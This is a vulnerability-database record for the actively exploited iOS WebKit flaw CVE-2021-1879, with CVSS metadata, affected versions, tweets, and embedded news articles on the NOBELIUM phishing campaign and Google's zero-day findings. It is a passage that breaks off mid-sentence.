ID CVE-2021-1879 Type cve Reporter product-security@apple.com Modified 2021-04-09T12:17:00
Description
This issue was addressed by improved management of object lifetimes. This issue is fixed in iOS 12.5.2, iOS 14.4.2 and iPadOS 14.4.2, watchOS 7.3.3. Processing maliciously crafted web content may lead to universal cross site scripting. Apple is aware of a report that this issue may have been actively exploited..
{"id": "CVE-2021-1879", "bulletinFamily": "NVD", "title": "CVE-2021-1879", "description": "This issue was addressed by improved management of object lifetimes. This issue is fixed in iOS 12.5.2, iOS 14.4.2 and iPadOS 14.4.2, watchOS 7.3.3. Processing maliciously crafted web content may lead to universal cross site scripting. Apple is aware of a report that this issue may have been actively exploited..", "published": "2021-04-02T19:15:00", "modified": "2021-04-09T12:17:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1879", "reporter": "product-security@apple.com", "references": ["https://support.apple.com/en-us/HT212258", "https://support.apple.com/en-us/HT212257", "https://support.apple.com/en-us/HT212256"], "cvelist": ["CVE-2021-1879"], "type": "cve", "lastseen": "2021-04-28T11:49:15", "edition": 3, "viewCount": 48, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:FF274F38-9A0C-47ED-97B9-57C114AB1511"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:D94336E4CB7536CC9CECC8C6FF696A77"]}, {"type": "thn", "idList": ["THN:BBBFDA7EEE18F813A5DA572FD390D528", "THN:080F85D43290560CDED8F282EE277B00", "THN:0D13405795D42B516C33D8E56A44BA9D", "THN:D28CBE91134FEFC2BFDB69F581D44799", "THN:4EFE9C3A3A0DEB0019296A14C9EAC1FA"]}, {"type": "mmpc", "idList": ["MMPC:6A79615935EB4546087AB44569C7B207"]}, {"type": "mssecure", "idList": ["MSSECURE:6A79615935EB4546087AB44569C7B207"]}, {"type": "threatpost", "idList": ["THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:70AF718BCABA36D5847184CA639B55C9"]}], "modified": "2021-04-28T11:49:15", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:FF274F38-9A0C-47ED-97B9-57C114AB1511"]}], "modified": "2021-04-28T11:49:15"}, "score": {"value": 3.1, "vector": "NONE", "modified": "2021-04-28T11:49:15", "rev": 2}, "twitter": {"counter": 15, "tweets": [{"link": "https://twitter.com/blackorbird/status/1415500445351432192", "text": "APT Campaign targeting Armenian users:\nChrome:CVE-2021-21166&CVE-2021-30551\nInternet Explorer:CVE-2021-33742'\nAPT29:\nWebKit (Safari):CVE-2021-1879\ncollect authentication cookies\nIOC:\nhttps://t.co/03UuSYzgZe?amp=1"}, {"link": "https://twitter.com/SandroBruscino/status/1415566320343691270", "text": "CVE-2021-1879: Use-After-Free in QuickTimePluginReplacement\n\nhttps://t.co/Z934JSEHcx?amp=1"}, {"link": "https://twitter.com/Securityblog/status/1415594961051992065", "text": "CVE-2021-1879: Use-After-Free in QuickTimePluginReplacement | 0-days In-the-Wild https://t.co/w4C5YTiVgo?amp=1"}, {"link": "https://twitter.com/d34dr4bbit/status/1415601307461767168", "text": "Safari CVE-2021-1879:"}, {"link": "https://twitter.com/Malwar3Ninja/status/1415647318406172682", "text": "[https://t.co/otlIKKaN3I?amp=1]/hashtag/Trending?src=hashtag_click \nWe have noted some /hashtag/CVE?src=hashtag_click trending on twitter \n CVE-2021-1879\nCVE-2021-33742\nCVE-2021-30551\nCVE-2021-21166\nKeseya breach\n Cryptomining\nEmail security\n/hashtag/threatintel?src=hashtag_click /hashtag/cybersecurity?src=hashtag_click /hashtag/BlueTeam?src=hashtag_click"}, {"link": "https://twitter.com/catnap707/status/1415847095278338048", "text": "Google\u304c\u300c\u30ed\u30b7\u30a2\u653f\u5e9c\u7cfb\u30cf\u30c3\u30ab\u30fc\u304ciOS\u306e\u30bc\u30ed\u30c7\u30a4\u8106\u5f31\u6027\u3092\u7a81\u3044\u3066\u30e8\u30fc\u30ed\u30c3\u30d1\u306e\u653f\u5e9c\u95a2\u4fc2\u8005\u3092\u653b\u6483\u3057\u3066\u3044\u305f\u300d\u3068\u5831\u544a - GIGAZINE\nhttps://t.co/8NFhNrKumE?amp=1\n\"CVE-2021-1879\u3068\u540c\u6642\u306b\u5831\u544a\u3055\u308c\u305f\u8106\u5f31\u6027\u306f\u3001Chrome\u306b\u95a2\u9023\u3059\u308bCVE-2021-21166\u3068CVE-2021-30551\u3001Internet Explorer\u306b\u95a2\u9023\u3059\u308bCVE-2021-33742\u3067\u3057\u305f\""}, {"link": "https://twitter.com/dw3w4at/status/1416739517973762049", "text": "\u300e\u3053\u306eCVE-2021-1879\u3092\u7a81\u304f\u30ea\u30f3\u30af\u3092\u30d3\u30b8\u30cd\u30b9\u7279\u5316\u578bSNS\u30fbLinkedIn\u306e\u30e1\u30c3\u30bb\u30fc\u30b8\u6a5f\u80fd\u3092\u7528\u3044\u3066\u30e8\u30fc\u30ed\u30c3\u30d1\u306e\u653f\u5e9c\u95a2\u4fc2\u8005\u306b\u9001\u4fe1\u3002\u300f / Google\u304c\u300c\u30ed\u30b7\u30a2\u653f\u5e9c\u7cfb\u30cf\u30c3\u30ab\u30fc\u304ciOS\u306e\u30bc\u30ed\u30c7\u30a4\u8106\u5f31\u6027\u3092\u7a81\u3044\u3066\u30e8\u30fc\u30ed\u30c3\u30d1\u306e\u653f\u5e9c\u95a2\u4fc2\u8005\u3092\u653b\u6483\u3057\u3066\u3044\u305f\u300d\u3068\u5831\u544a -"}, {"link": "https://twitter.com/BeClever_ITS/status/1417391488686862336", "text": "Reportados 4 /hashtag/0day?src=hashtag_click explotados activamente en IE, Safari y Chrome. \n CVE-2021-21166, CVE-2021-30551 y CVE-2021-33742: ejecutan c\u00f3digo arbitrario\n CVE-2021-1879: A trav\u00e9s de LinkedIn, exfiltra informaci\u00f3n de cookies de sesi\u00f3n y p\u00e1ginas web abiertas"}, {"link": "https://twitter.com/AfaqMKhan/status/1419833187656634370", "text": "These are not random numbers. These are 11 iOS zero-day /hashtag/vulnerabilities?src=hashtag_click found year to date. \n\nCVE-2021-30807, CVE-2021-1870, CVE-2021-1871, CVE-2021-1872, CVE-2021-1879, CVE-2021-30661, CVE-2021-30663, CVE-2021-30665, CVE-2021-30666, CVE-2021-30761, CVE-2021-30762\n\n/hashtag/apple?src=hashtag_click /hashtag/ios?src=hashtag_click"}, {"link": "https://twitter.com/ipssignatures/status/1420006561385177091", "text": "It is the first time for me to know a protection/signature/rule for the vulnerability CVE-2021-1879.\n/hashtag/S5rrrfji3zcb2e?src=hashtag_click"}], "modified": "2021-04-28T11:49:15"}, "vulnersScore": 3.1}, "cpe": [], "affectedSoftware": [{"cpeName": "apple:iphone_os", "name": "apple iphone os", "operator": "lt", "version": "14.4.2"}, {"cpeName": "apple:watchos", "name": "apple watchos", "operator": "lt", "version": "7.3.3"}, {"cpeName": "apple:iphone_os", "name": "apple iphone os", "operator": "lt", "version": "12.5.2"}, {"cpeName": "apple:ipad_os", "name": "apple ipad os", "operator": "lt", "version": "14.4.2"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:apple:iphone_os:14.4.2:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "14.4.2", "versionStartIncluding": "13.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:apple:ipad_os:14.4.2:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "14.4.2", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:apple:watchos:7.3.3:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "7.3.3", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:apple:iphone_os:12.5.2:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "12.5.2", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://support.apple.com/en-us/HT212256", "refsource": "MISC", "tags": ["Vendor Advisory"], "url": "https://support.apple.com/en-us/HT212256"}, {"name": "https://support.apple.com/en-us/HT212257", "refsource": "MISC", "tags": ["Vendor Advisory"], "url": "https://support.apple.com/en-us/HT212257"}, {"name": "https://support.apple.com/en-us/HT212258", "refsource": "MISC", "tags": ["Vendor Advisory"], "url": "https://support.apple.com/en-us/HT212258"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": [], "cwe": ["CWE-79"], "immutableFields": [], "scheme": null}
{"attackerkb": [{"lastseen": "2021-07-20T20:10:18", "description": "This issue was addressed by improved management of object lifetimes. This issue is fixed in iOS 12.5.2, iOS 14.4.2 and iPadOS 14.4.2, watchOS 7.3.3. Processing maliciously crafted web content may lead to universal cross site scripting. Apple is aware of a report that this issue may have been actively exploited..\n\n \n**Recent assessments:** \n \n**ccondon-r7** at March 29, 2021 4:05pm UTC reported:\n\nThis is an [actively exploited zero-day](<https://www.bleepingcomputer.com/news/security/apple-fixes-a-ios-zero-day-vulnerability-actively-used-in-attacks/>) in the WebKit browser engine affecting iPhone 6s and later models, as well as a slew of iPad models (and some Apple Watch versions, according to the Bleeping Computer article, though Apple\u2019s [characteristically sparse advisory](<https://support.apple.com/en-us/HT212256>) makes no mention of the watch). Discovered by Google\u2019s Threat Analysis Group, requires a user to open maliciously crafted web content. Update those iDevices, kids.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-04-02T00:00:00", "type": "attackerkb", "title": "CVE-2021-1879", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879"], "modified": "2021-04-10T00:00:00", "id": "AKB:FF274F38-9A0C-47ED-97B9-57C114AB1511", "href": "https://attackerkb.com/topics/S4T9RGhUVO/cve-2021-1879", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "malwarebytes": [{"lastseen": "2021-05-28T18:16:34", "description": "Nobelium is a synthetic chemical element with the symbol No and atomic number 102. It is named in honor of Alfred Nobel. But it is also the name given to the threat actor that is behind the attacks against [SolarWinds](<https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public-sector-via-supply-chain-software-update/>), the [Sunburst](<https://blog.malwarebytes.com/detections/backdoor-sunburst/>)[ backdoor](<https://blog.malwarebytes.com/detections/backdoor-sunburst/>), TEARDROP malware, GoldMax malware, other [related components](<https://blog.malwarebytes.com/malwarebytes-news/2021/01/malwarebytes-targeted-by-nation-state-actor-implicated-in-solarwinds-breach-evidence-suggests-abuse-of-privileged-access-to-microsoft-office-365-and-azure-environments/>).\n\nMicrosoft Threat Intelligence Center (MSTIC) has issued a warning stating that it has uncovered a wide-scale malicious email campaign operated by NOBELIUM. In this campaign NOBELIUM leveraged the legitimate mass-mailing service Constant Contact. This allowed the threat actor to masquerade as a US-based development organization to distribute malicious URLs to a wide variety of organizations and industry verticals.\n\n### The campaign\n\nThis new wide-scale email campaign leverages the legitimate service Constant Contact to send malicious links that are disguised since they are obscured behind the mailing service\u2019s URL. Many similar services use this type of mechanism to simplify the sharing of files while providing insights into by who and when links are clicked.\n\n### Finding the most effective delivery method\n\nThe early beginnings of these campaigns were first noticed January 28, 2021, when the actor was seemingly performing early reconnaissance by only sending the tracking portion of the email, leveraging [Firebase](<https://firebase.google.com/>) URLs to record targets who clicked. Malicious payloads were not observed during this early activity.\n\nIn the next evolution of the campaign, MSTIC says it observed NOBELIUM attempting to compromise systems through an HTML file attached to a spear-phishing email. If a receiver opened the HTML attachment, embedded JavaScript code in the HTML wrote an ISO file to disc and encouraged the target to open it.\n\nSimilar spear-phishing campaigns were detected throughout March, which included the NOBELIUM actor making several alterations to the HTML document based on the intended target. MSTIC says it observed the actor encoding the ISO within the HTML document itself; redirecting from the HTML document to an ISO, which contained an RTF document, with the malicious Cobalt Strike Beacon DLL encoded within it; and replacing the HTML with a URL that led to a website that spoofed the targeted organization and hosted the ISO file.\n\n### The ISO payload\n\nAs we noted above, the payload is delivered via an ISO file. When ISO files are opened they are mounted much like an external or network drive. Threat actors may deploy a container into an environment to facilitate execution or evade defenses. And sometimes they will deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, a threat actor may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In this case, a shortcut file (`.lnk`) would execute an accompanying DLL, which would result in a Cobalt Strike Beacon executing on the host. It is worth noting that the DLL is a hidden file. Cobalt Strike Beacons call out to the attacker's infrastructure via port 443.\n\n### Experimenting with the payload\n\nThe delivery method was not the only evolving factor in the campaign. In one of the more targeted waves, no ISO payload was delivered, but additional profiling of the target device was performed by an actor-controlled web server after a user clicked the link. If the device targeted was an Apple iOS device, the user was redirected to another server under NOBELIUM control, where the since-patched zero-day exploit for [CVE-2021-1879](<https://nvd.nist.gov/vuln/detail/CVE-2021-1879>) was served.\n\nDuring the waves in April, the threat actor stopped using Firebase, and no longer tracked users. Their techniques shifted to encoding the ISO inside the HTML document. Target host details were now stored by the payload on a remote server via the use of the `api.ipify.org` service. The threat actor would sometimes employ checks for specific internal Active Directory domains that would terminate execution of the malicious process if it identified an unintended environment.\n\n### The latest surge\n\nOn May 25, the NOBELIUM campaign was noticed to escalate significantly, attempting to target around 3,000 individual accounts across more than 150 organizations. Due to the high volume of emails distributed in this campaign, many automated email threat detection systems blocked most of the malicious emails and marked them as spam. However, some automated threat detection systems may have successfully delivered some of the earlier emails to recipients either due to configuration and policy settings or prior to detections being in place.\n\n### The goal\n\nThe successful deployment of the payload enables NOBELIUM to gain persistent access to the compromised machines. The successful execution of these malicious payloads would also enable NOBELIUM to conduct further malicious activity, such as lateral movement, data exfiltration, and delivery of additional malware.\n\n### Indiciators of compromise (IOCs)\n\nIn its [warning](<https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/>), MSTIC provides a list of indicators of compromise from the large-scale campaign that launched on May 25, 2021. The organization notes that the attack is still active, these indicators should not be considered exhaustive for this observed activity.\n\nMalwarebytes detected the Cobalt Strike payload prior to the attack\n\nMalwarebytes also blocks the domain theyardservice.com\n\nStay safe, everyone!\n\nThe post [SolarWinds attackers launch new campaign](<https://blog.malwarebytes.com/threat-analysis/2021/05/solarwinds-attackers-launch-new-campaign/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-28T14:24:01", "type": "malwarebytes", "title": "SolarWinds attackers launch new campaign", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879"], "modified": "2021-05-28T14:24:01", "id": "MALWAREBYTES:D94336E4CB7536CC9CECC8C6FF696A77", "href": "https://blog.malwarebytes.com/threat-analysis/2021/05/solarwinds-attackers-launch-new-campaign/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "thn": [{"lastseen": "2021-06-02T06:32:08", "bulletinFamily": "info", "cvelist": ["CVE-2021-1879"], "description": "[](<https://thehackernews.com/images/-fNVyfZ9xLu4/YLDS4IiFgCI/AAAAAAAACq0/ysLAa9WYkXYAknx7W8VKLTshqroWpDJFgCLcBGAsYHQ/s0/russian-hackers.jpg>)\n\nMicrosoft on Thursday disclosed that the threat actor behind the [SolarWinds supply chain hack](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) returned to the threat landscape to target government agencies, think tanks, consultants, and non-governmental organizations located across 24 countries, including the U.S.\n\nSome of the entities that were singled out include the U.S. Atlantic Council, the Organization for Security and Co-operation in Europe (OSCE), the Ukrainian Anti-Corruption Action Center (ANTAC), the EU DisinfoLab, and the Government of Ireland's Department of Foreign Affairs.\n\n\"This wave of attacks targeted approximately 3,000 email accounts at more than 150 different organizations,\" Tom Burt, Microsoft's Corporate Vice President for Customer Security and Trust, [said](<https://blogs.microsoft.com/on-the-issues/2021/05/27/nobelium-cyberattack-nativezone-solarwinds/>). \"At least a quarter of the targeted organizations were involved in international development, humanitarian, and human rights work.\"\n\nMicrosoft attributed the ongoing intrusions to the Russian threat actor it tracks as Nobelium, and by the wider cybersecurity community under the monikers APT29, UNC2452 (FireEye), SolarStorm (Unit 42), StellarParticle (Crowdstrike), Dark Halo (Volexity), and Iron Ritual (Secureworks).\n\n[](<https://go.thn.li/1-728-5> \"password auditor\" )\n\nThe latest [wave](<https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/>) in a series of intrusions is said to have begun on Jan. 28, 2021, before reaching a new level of escalation on May 25. The attacks leveraged a legitimate mass-mailing service called Constant Contact to conceal its malicious activity and masquerade as USAID, a U.S.-based development organization, for a wide-scale phishing campaign that distributed phishing emails to a variety of organizations and industry verticals.\n\n\"Nobelium launched this week's attacks by gaining access to the Constant Contact account of USAID,\" Burt said.\n\nThese seemingly authentic emails included a link that, when clicked, delivered a malicious optical disc image file (\"ICA-declass.iso\") to inject a custom Cobalt Strike Beacon implant dubbed NativeZone (\"Documents.dll\"). The backdoor, similar to previous custom malware like [Raindrop](<https://thehackernews.com/2021/01/researchers-discover-raindrop-4th.html>) and [Teardrop](<https://thehackernews.com/2020/12/a-second-hacker-group-may-have-also.html>), comes equipped with capabilities to maintain persistent access, conduct lateral movement, exfiltrate data, and install additional malware.\n\n[](<https://thehackernews.com/images/-Kqca89OnZHA/YLDPv9iZshI/AAAAAAAACqk/k4ouHzcz69c07swH-6a9KPn5MiMEqeytgCLcBGAsYHQ/s0/hackers.jpg>)\n\nIn another variation of the targeted attacks detected before April, Nobelium experimented with profiling the target machine after the email recipient clicked the link. In the event the underlying operating system turned out to be iOS, the victim was redirected to a second remote server to dispatch an exploit for the then zero-day [CVE-2021-1879](<https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html>). Apple addressed the flaw on March 26, acknowledging that \"this issue may have been actively exploited.\"\n\n[](<https://thehackernews.com/images/-VCSkL1uJd1E/YLDQPDIOPaI/AAAAAAAACqs/_v2-iFt6JOc5GNscw2QmgJTekQnK5Kr-gCLcBGAsYHQ/s0/ms-windows.jpg>)\n\nCybersecurity firms [Secureworks](<https://www.secureworks.com/blog/usaid-themed-phishing-campaign-leverages-us-elections-lure>) and [Volexity](<https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/>), which corroborated the findings, said the campaign singled out non-governmental organizations, research institutions, government entities, and international agencies situated in the U.S., Ukraine, and the European Union.\n\n\"The very narrow and specific set of email identifiers and organizations observed by CTU researchers strongly indicate that the campaign is focused on U.S. and European diplomatic and policy missions that would be of interest to foreign intelligence services,\" researchers from Secureworks Counter Threat Unit noted.\n\nThe latest attacks add to evidence of the threat actor's recurring pattern of using [unique infrastructure](<https://thehackernews.com/2021/04/researchers-find-additional.html>) and tooling for each target, thereby giving the attackers a high level of stealth and enabling them to remain undetected for extended periods of time.\n\nThe ever-evolving nature of Nobelium's tradecraft is also likely to be a direct response to the highly publicized SolarWinds incident, suggesting the attackers could further continue to experiment with their methods to meet their objectives.\n\n\"When coupled with the attack on SolarWinds, it's clear that part of Nobelium's playbook is to gain access to trusted technology providers and infect their customers,\" Burt said. \"By piggybacking on software updates and now mass email providers, Nobelium increases the chances of collateral damage in espionage operations and undermines trust in the technology ecosystem.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-06-02T04:59:08", "published": "2021-05-28T11:24:00", "id": "THN:D28CBE91134FEFC2BFDB69F581D44799", "href": "https://thehackernews.com/2021/05/solarwinds-hackers-target-think-tanks.html", "type": "thn", "title": "SolarWinds Hackers Target Think Tanks With New 'NativeZone' Backdoor", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-15T14:34:30", "description": "[](<https://thehackernews.com/images/-xmPJ5TMTpac/YO_wfpf1LkI/AAAAAAAADM4/xSKsZYAbLBYJjYvNQilqUM9z0lf0Rx7_gCLcBGAsYHQ/s0/chrome.jpg>)\n\nThreat intelligence researchers from Google on Wednesday [shed more light](<https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/>) on four in-the-wild zero-days in Chrome, Safari, and Internet Explorer browsers that were exploited by malicious actors in different campaigns since the start of the year.\n\nWhat's more, three of the four zero-days were engineered by commercial providers and sold to and used by government-backed actors, contributing to an uptick in real-world attacks. The list of now-patched vulnerabilities is as follows -\n\n * [**CVE-2021-1879**](<https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html>): Use-After-Free in QuickTimePluginReplacement (Apple WebKit)\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>): Chrome Object Lifecycle Issue in Audio\n * [**CVE-2021-30551**](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>): Chrome Type Confusion in V8\n * [**CVE-2021-33742**](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>): Internet Explorer out-of-bounds write in MSHTML\n\nBoth Chrome zero-days \u2014 CVE-2021-21166 and CVE-2021-30551 \u2014 are believed to have been used by the same actor, and were delivered as one-time links sent via email to targets located in Armenia, with the links redirecting unsuspecting users to attacker-controlled domains that masqueraded as legitimate websites of interest to the recipients.\n\n[](<https://go.thn.li/1-free-300-7> \"Stack Overflow Teams\" )\n\nThe malicious websites took charge of fingerprinting the devices, including collecting system information about the clients, before delivering a second-stage payload.\n\nWhen Google rolled out a patch for CVE-2021-30551, Shane Huntley, Director of Google's Threat Analysis Group (TAG), revealed that the vulnerability was leveraged by the same actor that abused CVE-2021-33742, an actively exploited remote code execution flaw in Windows MSHTML platform that was addressed by Microsoft as part of its [Patch Tuesday update](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>) on June 8.\n\nThe two zero-days were provided by a commercial exploit broker to a nation-state adversary, which used them in limited attacks against targets in Eastern Europe and the Middle East, Huntley previously added.\n\n[](<https://thehackernews.com/images/--ol-CfJ3-bE/YO_tDkpfuNI/AAAAAAAADMw/bonGU0wpX_QzAsMNe5_Eh_0_Nb4OAma_QCLcBGAsYHQ/s0/zero-day.jpg>)\n\nNow according to a technical report published by the team, all the three zero-days were \"developed by the same commercial surveillance company that sold these capabilities to two different government-backed actors,\" adding the Internet Explorer flaw was used in a campaign targeting Armenian users with malicious Office documents that loaded web content within the web browser.\n\nGoogle did not disclose the identities of the exploit broker or the two threat actors that used the vulnerabilities as part of their attacks.\n\n## SolarWinds Hackers Exploited iOS Zero-Day\n\nThe Safari zero-day, in contrast, concerned a WebKit flaw that could enable adversaries to process maliciously crafted web content that may result in universal cross-site scripting attacks. The issue was rectified by Apple on March 26, 2021.\n\nAttacks leveraging CVE-2021-1879, which Google attributed to a \"likely Russian government-backed actor,\" were executed by means of sending malicious links to government officials over LinkedIn that, when clicked from an iOS device, redirected the user to a rogue domain that served the next-stage payloads.\n\n[](<https://go.thn.li/privileged_728> \"Prevent Data Breaches\" )\n\nIt's worth noting that the offensive also mirrors a [wave of targeted attacks](<https://thehackernews.com/2021/05/solarwinds-hackers-target-think-tanks.html>) unleashed by Russian hackers tracked as Nobelium, which was found abusing the vulnerability to strike government agencies, think tanks, consultants, and non-governmental organizations as part of an email phishing campaign.\n\nNobelium, a threat actor linked to the Russian Foreign Intelligence Service (SVR), is also suspected of orchestrating the [SolarWinds supply chain attack](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>) late last year. It's known by other aliases such as APT29, UNC2452 (FireEye), SolarStorm (Unit 42), StellarParticle (Crowdstrike), Dark Halo (Volexity), and Iron Ritual (Secureworks).\n\n\"Halfway into 2021, there have been [33 zero-day exploits](<https://googleprojectzero.github.io/0days-in-the-wild/rca.html>) used in attacks that have been publicly disclosed this year \u2014 11 more than the total number from 2020,\" TAG researchers Maddie Stone and Clement Lecigne noted. \"While there is an increase in the number of zero-day exploits being used, we believe greater detection and disclosure efforts are also contributing to the upward trend.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2021-07-15T08:25:00", "type": "thn", "title": "Google Details iOS, Chrome, IE Zero-Day Flaws Exploited Recently in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1879", "CVE-2021-21166", "CVE-2021-30551", "CVE-2021-33742"], "modified": "2021-07-15T12:45:33", "id": "THN:BBBFDA7EEE18F813A5DA572FD390D528", "href": "https://thehackernews.com/2021/07/google-details-ios-chrome-ie-zero-day.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-27T10:36:36", "description": "[](<https://thehackernews.com/images/-5Zi_45-pXus/YF7LgsUU1pI/AAAAAAAACHQ/ltYZDuSTuqwbzRstY55f-hwWOXjS_zI2gCLcBGAsYHQ/s0/mac-malware-proxy-setting.png>)\n\nMerely weeks after releasing out-of-band patches for iOS, iPadOS, macOS and watchOS, Apple has issued yet another security update for iPhone, iPad, and Apple Watch to fix a critical zero-day weakness that it says is being actively exploited in the wild.\n\nTracked as **CVE-2021-1879**, the vulnerability relates to a WebKit flaw that could enable adversaries to process maliciously crafted web content that may result in universal cross-site scripting attacks.\n\n\"This issue was addressed by improved management of object lifetimes,\" the iPhone maker noted.\n\nApple has credited Clement Lecigne and Billy Leonard of Google's Threat Analysis Group for discovering and reporting the issue. While details of the flaw have not been disclosed, the company said it's aware of reports that CVE-2021-1879 may have been actively exploited.\n\nUpdates are available for the following devices:\n\n * [iOS 12.5.2](<https://support.apple.com/en-us/HT212257>) \\- Phone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation)\n * [iOS 14.4.2](<https://support.apple.com/en-us/HT212256>) \\- iPhone 6s and later, and iPod touch (7th generation)\n * [iPadOS 14.4.2](<https://support.apple.com/en-us/HT212256>) \\- iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later\n * [watchOS 7.3.3](<https://support.apple.com/en-us/HT212258>) \\- Apple Watch Series 3 and later\n\nThe latest release arrives close on the heels of a patch for a separate WebKit flaw ([CVE-2021-1844](<https://thehackernews.com/2021/03/apple-issues-patch-for-remote-hacking.html>)) that Apple shipped earlier this month. In January 2021, the company resolved [three zero-day vulnerabilities](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (CVE-2021-1782, CVE-2021-1870, and 